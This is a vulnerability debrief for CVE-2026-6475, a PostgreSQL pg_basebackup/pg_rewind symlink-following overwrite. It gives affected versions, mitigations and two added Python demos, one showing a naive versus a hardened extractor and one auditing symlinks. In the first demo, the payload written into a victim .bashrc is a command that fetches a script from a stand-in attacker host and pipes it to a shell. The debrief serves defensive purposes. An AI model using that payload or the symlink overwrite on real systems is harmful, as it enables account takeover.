PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-6475 Postgresql CVE debrief

CVE-2026-6475 is a file-overwrite issue in PostgreSQL's pg_basebackup (plain format) and pg_rewind caused by symbolic-link following. According to the vendor, a superuser on the origin server can use it to overwrite local files on the host running the tool, such as a user's .bashrc, and through that compromise the operating-system account. The vendor also points out an important practical limitation: if the server is started normally after these commands, it already implicitly trusts the origin superuser through features such as shared_preload_libraries, so the overwrite adds little on its own. The issue is therefore most actionable when something happens between the backup or rewind step and the server start, such as moving the files to another VM or snapshotting the VM. Affected releases are earlier than 18.4, 17.10, 16.14, 15.18 and 14.23.

Vendor
Postgresql
Product
Unknown
CVSS
HIGH 8.8
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-14
Original CVE updated
2026-05-18
Advisory published
2026-05-14
Advisory updated
2026-05-18

Who should care

PostgreSQL administrators and platform teams that use pg_basebackup in plain format or pg_rewind, especially in VM migration, snapshot, cloning, or restore workflows where the resulting files may be reused before a fresh server start.

Technical summary

The vulnerability is a UNIX symbolic-link-following problem (CWE-61) in pg_basebackup's plain-format output and in pg_rewind. Both tools write files received from an origin server into a local directory; according to the vendor advisory and the NVD record, a symlink encountered during that write is followed, so the party that controls what the tool receives, the origin superuser, can direct the write at an arbitrary local file. The impact is constrained by PostgreSQL's trust model after the commands complete: a server started from that directory in the same environment already implicitly trusts the origin superuser through mechanisms such as shared_preload_libraries, so the overwrite gives a hostile origin nothing it could not already obtain. The practical risk arises when the affected files are moved, snapshotted or otherwise handled before server startup, because the overwritten local file then travels with them into an environment that never intended to trust the origin.
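To make the CWE-61 pattern concrete, here is an added example that is not PostgreSQL's code and does not claim to reproduce the advisory's exact sequence: a toy extractor that writes entries from an origin-controlled stream into a local directory, once the way a symlink-following writer behaves and once with the checks that refuse to write through a link. The stream, the output layout and the victim dotfile are all constructed for the demo; symlink entries are kept in the stream because a data directory legitimately contains links (tablespaces), so a writer cannot simply reject them all.

```python
"""Symlink-following writer vs. a writer that refuses to follow links.
Added example for the CWE-61 pattern; not PostgreSQL's code."""
import os
import tempfile
from pathlib import Path


def origin_stream(victim_dotfile):
    """Constructed stand-in for what an origin superuser can send: a symlink
    entry that points at a file outside the output tree, followed by a regular
    file entry with the same relative path. The file write is what lands on
    the victim's dotfile if the writer follows the link."""
    return [
        ("file", "PG_VERSION", b"17\n"),
        ("symlink", "base/1234", str(victim_dotfile)),
        ("file", "base/1234", b"curl http://attacker.invalid/x | sh\n"),
    ]


def naive_extract(stream, outdir):
    """Follows symlinks: open() on an existing link writes through it."""
    outdir = Path(outdir)
    for kind, rel, payload in stream:
        dest = outdir / rel
        dest.parent.mkdir(parents=True, exist_ok=True)
        if kind == "symlink":
            dest.symlink_to(payload)
        else:
            with open(dest, "wb") as f:  # if dest is a link, this truncates its target
                f.write(payload)


def safe_extract(stream, outdir):
    """Never writes through a link. Every directory between outdir and dest
    must be a real directory (an intermediate symlink would redirect the whole
    subtree), and the final open uses O_NOFOLLOW so a link at dest fails
    instead of being followed. Symlink entries themselves are created as given."""
    outdir = Path(outdir).resolve()
    for kind, rel, payload in stream:
        dest = Path(os.path.normpath(outdir / rel))  # collapse any '..'
        if outdir not in dest.parents:
            raise RuntimeError(f"path escapes output directory: {rel}")
        parent = dest.parent
        while parent != outdir:
            if parent.is_symlink():
                raise RuntimeError(f"refusing to traverse symlink at {parent}")
            parent = parent.parent
        dest.parent.mkdir(parents=True, exist_ok=True)
        if kind == "symlink":
            dest.symlink_to(payload)
            continue
        try:
            fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW, 0o600)
        except OSError as e:
            raise RuntimeError(f"refusing to write through symlink at {dest}: {e.strerror}")
        with os.fdopen(fd, "wb") as f:
            f.write(payload)


def demo():
    """Run both writers on the constructed stream, each against its own copy of
    a victim .bashrc. Returns [(dotfile_overwritten, error_message), ...] in the
    order (naive, safe)."""
    original = "# victim's shell startup\n"
    results = []
    with tempfile.TemporaryDirectory() as tmp:
        for extractor in (naive_extract, safe_extract):
            base = Path(tmp) / extractor.__name__
            home = base / "home"
            home.mkdir(parents=True)
            dotfile = home / ".bashrc"
            dotfile.write_text(original)
            out = base / "backup"
            out.mkdir()
            err = None
            try:
                extractor(origin_stream(dotfile), out)
            except RuntimeError as e:
                err = str(e)
            results.append((dotfile.read_text() != original, err))
    return results


if __name__ == "__main__":
    for name, (overwritten, err) in zip(("naive", "safe"), demo()):
        print(f"{name}: dotfile overwritten={overwritten} error={err}")
```

The hardened writer stops both the final-component link (O_NOFOLLOW) and a link in an intermediate directory (the lstat walk); checking only one of the two leaves the other path open. A data-directory writer cannot reject links that point outside the tree, since tablespace links are supposed to, so the defence has to be on the write, not on the link.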

Defensive priority

High for environments using pg_basebackup plain format or pg_rewind in automation, backup, cloning, or VM-snapshot workflows; moderate otherwise. The vulnerability is vendor-patched, but the real-world impact depends on how the resulting files are handled before the database server restarts.

Recommended defensive actions

  • Upgrade to a fixed release: 18.4, 17.10, 16.14, 15.18 or 14.23, or later. Since the faulty write happens in the tool, upgrade the installations that run pg_basebackup and pg_rewind, not only the origin server.
  • Review any automation that runs pg_basebackup in plain format or pg_rewind as part of VM cloning, snapshotting or image creation, and identify the window between the tool finishing and the server being started.
  • Treat backup or rewind output as untrusted until it has been validated and the server has been started in its intended environment; in particular, look for unexpected symlinks in the output tree before it is moved or snapshotted.
  • Verify that operational procedures do not carry files produced by these tools between systems in a way that could preserve attacker-influenced symlinks or already-overwritten local files.
  • Consult the PostgreSQL vendor advisory for patch and mitigation guidance.
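As an added example for the validation step (not a PostgreSQL utility), the following script lists every symlink in a plain-format backup or rewound data directory and separates the ones a healthy tree is expected to have from the ones an operator should inspect before the tree is moved or snapshotted. It assumes the only expected links are the per-tablespace entries under pg_tblspc/ and a pg_wal link of the kind pg_basebackup --waldir creates; any other link is reported, along with whether its target resolves outside the tree. The sample tree it audits is constructed in a temporary directory.

```python
"""Audit a data directory for symlinks before reusing it elsewhere.
Added example; assumes pg_tblspc/* and pg_wal are the only expected links."""
import os
import tempfile
from pathlib import Path

EXPECTED_TOP_LEVEL_LINKS = {"pg_wal"}   # pg_basebackup --waldir creates this link
EXPECTED_LINK_DIRS = {"pg_tblspc"}      # one link per tablespace is normal here


def classify_symlinks(root):
    """Return (relative_path, link_target, outside_tree, expected) for every
    symlink under root. Links are never followed while walking, so a link to a
    directory is reported but not descended into."""
    root = Path(root).resolve()
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if not link.is_symlink():
                continue
            rel = link.relative_to(root)
            target = os.readlink(link)
            # Resolve relative targets against the link's own directory, as the
            # kernel would; absolute targets replace the base.
            resolved = (link.parent / target).resolve()
            outside = resolved != root and root not in resolved.parents
            expected = (
                rel.parts == (name,) and name in EXPECTED_TOP_LEVEL_LINKS
            ) or (len(rel.parts) == 2 and rel.parts[0] in EXPECTED_LINK_DIRS)
            findings.append((str(rel), target, outside, expected))
    return findings


def unexpected_symlinks(root):
    """Only the links an operator needs to look at before reusing the tree."""
    return [f for f in classify_symlinks(root) if not f[3]]


def build_demo_tree(base):
    """Constructed sample: a minimal data-directory layout with one legitimate
    tablespace link, one pg_wal link, and one planted link to a dotfile outside
    the tree (the kind of entry an origin-influenced tree could contain)."""
    base = Path(base)
    data = base / "data"
    (data / "base").mkdir(parents=True)
    (data / "pg_tblspc").mkdir()
    (base / "tblspc_dir").mkdir()
    (base / "wal_dir").mkdir()
    (base / "home").mkdir()
    (base / "home" / ".bashrc").write_text("# victim dotfile\n")
    (data / "postgresql.conf").write_text("shared_preload_libraries = ''\n")
    (data / "pg_tblspc" / "16385").symlink_to(base / "tblspc_dir")
    (data / "pg_wal").symlink_to(base / "wal_dir")
    (data / "base" / "planted").symlink_to(base / "home" / ".bashrc")
    return data


def demo_findings():
    """Audit the constructed tree; returns (all_findings, unexpected_findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        data = build_demo_tree(tmp)
        return classify_symlinks(data), unexpected_symlinks(data)


if __name__ == "__main__":
    for rel, target, outside, expected in demo_findings()[0]:
        flag = "ok     " if expected else "REVIEW "
        print(f"{flag} {rel} -> {target} (outside tree: {outside})")
```

Run it against the output directory on the host that produced it, before the directory is copied, snapshotted or turned into an image; a link outside pg_tblspc/ or at a path other than pg_wal is the thing to explain before the files move on. The script does not detect a file that has already been overwritten through a link, only links still present in the tree.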

Evidence notes

This debrief is based only on the supplied NVD record and the linked PostgreSQL vendor advisory. NVD classifies the issue as CVSS 3.1 8.8 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H and CWE-61. Note that this vector scores PR:N and UI:R while the vendor description attributes the overwrite to an origin superuser; weigh that precondition against your own deployment rather than taking the 8.8 at face value. The source description states the affected versions and the operational caveat that practical impact depends on what happens between backup/rewind completion and server start.

Official resources

The NVD record and the PostgreSQL vendor advisory were both published on 2026-05-14; the NVD record was last modified on 2026-05-18. Use the advisory date as the publication context for the issue, not the later modification time.